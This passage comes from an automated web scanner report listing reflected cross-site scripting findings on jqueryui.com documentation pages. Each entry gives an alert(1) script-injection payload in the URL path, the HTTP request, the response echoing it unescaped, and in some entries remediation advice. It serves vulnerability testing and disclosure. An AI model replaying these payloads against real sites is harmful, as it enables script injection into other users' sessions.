This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /docs/Effects/Methods727f2</script><script>alert(1)</script>fb56f9f5163 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27165

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Effects/Methods727f2</script><script>alert(1)</script>fb56f9f5163</title>
   
   <meta name="keywords" content
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Effects/Methods727f2</script><script>alert(1)</script>fb56f9f5163]").addClass("selected");
</script>
...[SNIP]...

1.50. http://jqueryui.com/docs/Getting_Started [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Getting_Started

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c05c</script><script>alert(1)</script>f4216eaa9ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /docs/Getting_Started2c05c</script><script>alert(1)</script>f4216eaa9ea HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27165

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Getting_Started2c05c</script><script>alert(1)</script>f4216eaa9ea</title>
   
   <meta name="keywords" content
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Getting_Started2c05c</script><script>alert(1)</script>f4216eaa9ea]").addClass("selected");
</script>
...[SNIP]...

1.51. http://jqueryui.com/docs/Getting_Started [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Getting_Started

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload ed1f2</title><script>alert(1)</script>4e14f46f97e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Getting_Starteded1f2</title><script>alert(1)</script>4e14f46f97e HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27162

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Getting_Starteded1f2</title><script>alert(1)</script>4e14f46f97e</title>
   
   <meta name="keywords" content=
...[SNIP]...

1.52. http://jqueryui.com/docs/Git [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Git

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1b27</script><script>alert(1)</script>acb8bbcb22c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /docs/Gitc1b27</script><script>alert(1)</script>acb8bbcb22c HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27129

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Gitc1b27</script><script>alert(1)</script>acb8bbcb22c</title>
   
   <meta name="keywords" content="jquery,use
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Gitc1b27</script><script>alert(1)</script>acb8bbcb22c]").addClass("selected");
</script>
...[SNIP]...

1.53. http://jqueryui.com/docs/Git [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Git

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 325b5</title><script>alert(1)</script>2996e1b9954 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Git325b5</title><script>alert(1)</script>2996e1b9954 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27126

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Git325b5</title><script>alert(1)</script>2996e1b9954</title>
   
   <meta name="keywords" content="jquery,user
...[SNIP]...

1.54. http://jqueryui.com/docs/Theming [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Theming

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ca81</script><script>alert(1)</script>174ea7c0154 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /docs/Theming8ca81</script><script>alert(1)</script>174ea7c0154 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27141

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theming8ca81</script><script>alert(1)</script>174ea7c0154</title>
   
   <meta name="keywords" content="jquery
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Theming8ca81</script><script>alert(1)</script>174ea7c0154]").addClass("selected");
</script>
...[SNIP]...

1.55. http://jqueryui.com/docs/Theming [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Theming

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload e8b94</title><script>alert(1)</script>cf2988328a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Theminge8b94</title><script>alert(1)</script>cf2988328a4 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27138

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theminge8b94</title><script>alert(1)</script>cf2988328a4</title>
   
   <meta name="keywords" content="jquery,
...[SNIP]...

1.56. http://jqueryui.com/docs/Theming/API [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Theming/API

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 4cda6</title><script>alert(1)</script>2f586665f1b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Theming4cda6</title><script>alert(1)</script>2f586665f1b/API HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27150

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theming4cda6</title><script>alert(1)</script>2f586665f1b/API</title>
   
   <meta name="keywords" content="jqu
...[SNIP]...

1.57. http://jqueryui.com/docs/Theming/API [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Theming/API

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ceab9</script><script>alert(1)</script>49513c3cd2c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /docs/Themingceab9</script><script>alert(1)</script>49513c3cd2c/API HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27153

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Themingceab9</script><script>alert(1)</script>49513c3cd2c/API</title>
   
   <meta name="keywords" content="jq
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Themingceab9</script><script>alert(1)</script>49513c3cd2c/API]").addClass("selected");
</script>
...[SNIP]...

1.58. http://jqueryui.com/docs/Theming/API [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Theming/API

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 91557</title><script>alert(1)</script>02c61d91876 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Theming/API91557</title><script>alert(1)</script>02c61d91876 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27150

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theming/API91557</title><script>alert(1)</script>02c61d91876</title>
   
   <meta name="keywords" content="jqu
...[SNIP]...

1.59. http://jqueryui.com/docs/Theming/API [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Theming/API

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54db8</script><script>alert(1)</script>9368d5de4a0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /docs/Theming/API54db8</script><script>alert(1)</script>9368d5de4a0 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27153

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theming/API54db8</script><script>alert(1)</script>9368d5de4a0</title>
   
   <meta name="keywords" content="jq
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Theming/API54db8</script><script>alert(1)</script>9368d5de4a0]").addClass("selected");
</script>
...[SNIP]...

1.60. http://jqueryui.com/docs/Theming/ThemeSwitcher [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Theming/ThemeSwitcher

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6065</script><script>alert(1)</script>1b0f67c058 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /docs/Themingf6065</script><script>alert(1)</script>1b0f67c058/ThemeSwitcher HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27180

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Themingf6065</script><script>alert(1)</script>1b0f67c058/ThemeSwitcher</title>
   
   <meta name="keywords" co
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Themingf6065</script><script>alert(1)</script>1b0f67c058/ThemeSwitcher]").addClass("selected");
</script>
...[SNIP]...

1.61. http://jqueryui.com/docs/Theming/ThemeSwitcher [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Theming/ThemeSwitcher

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 101b8</title><script>alert(1)</script>6252d69be12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Theming101b8</title><script>alert(1)</script>6252d69be12/ThemeSwitcher HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27180

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theming101b8</title><script>alert(1)</script>6252d69be12/ThemeSwitcher</title>
   
   <meta name="keywords" co
...[SNIP]...

1.62. http://jqueryui.com/docs/Theming/ThemeSwitcher [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Theming/ThemeSwitcher

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8461c</script><script>alert(1)</script>f779f290738 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /docs/Theming/ThemeSwitcher8461c</script><script>alert(1)</script>f779f290738 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27183

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theming/ThemeSwitcher8461c</script><script>alert(1)</script>f779f290738</title>
   
   <meta name="keywords" c
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Theming/ThemeSwitcher8461c</script><script>alert(1)</script>f779f290738]").addClass("selected");
</script>
...[SNIP]...

1.63. http://jqueryui.com/docs/Theming/ThemeSwitcher [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Theming/ThemeSwitcher

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 3d88e</title><script>alert(1)</script>b52ee0bbbb4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Theming/ThemeSwitcher3d88e</title><script>alert(1)</script>b52ee0bbbb4 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27180

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theming/ThemeSwitcher3d88e</title><script>alert(1)</script>b52ee0bbbb4</title>
   
   <meta name="keywords" co
...[SNIP]...

1.64. http://jqueryui.com/docs/Theming/Themeroller [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Theming/Themeroller

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82616</script><script>alert(1)</script>a7dc3dd4a3c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /docs/Theming82616</script><script>alert(1)</script>a7dc3dd4a3c/Themeroller HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27177

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theming82616</script><script>alert(1)</script>a7dc3dd4a3c/Themeroller</title>
   
   <meta name="keywords" con
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Theming82616</script><script>alert(1)</script>a7dc3dd4a3c/Themeroller]").addClass("selected");
</script>
...[SNIP]...

1.65. http://jqueryui.com/docs/Theming/Themeroller [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Theming/Themeroller

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 7efef</title><script>alert(1)</script>19810303b4b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Theming7efef</title><script>alert(1)</script>19810303b4b/Themeroller HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27174

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theming7efef</title><script>alert(1)</script>19810303b4b/Themeroller</title>
   
   <meta name="keywords" cont
...[SNIP]...

1.66. http://jqueryui.com/docs/Theming/Themeroller [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Theming/Themeroller

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cce2</script><script>alert(1)</script>ff24c95c7da was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /docs/Theming/Themeroller2cce2</script><script>alert(1)</script>ff24c95c7da HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27177

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theming/Themeroller2cce2</script><script>alert(1)</script>ff24c95c7da</title>
   
   <meta name="keywords" con
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Theming/Themeroller2cce2</script><script>alert(1)</script>ff24c95c7da]").addClass("selected");
</script>
...[SNIP]...

1.67. http://jqueryui.com/docs/Theming/Themeroller [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Theming/Themeroller

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 7c80b</title><script>alert(1)</script>996164f01b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Theming/Themeroller7c80b</title><script>alert(1)</script>996164f01b7 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27174

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theming/Themeroller7c80b</title><script>alert(1)</script>996164f01b7</title>
   
   <meta name="keywords" cont
...[SNIP]...

1.68. http://jqueryui.com/docs/Upgrade_Guide [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Upgrade_Guide

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3a55</script><script>alert(1)</script>a48fc76bd21 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /docs/Upgrade_Guideb3a55</script><script>alert(1)</script>a48fc76bd21 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
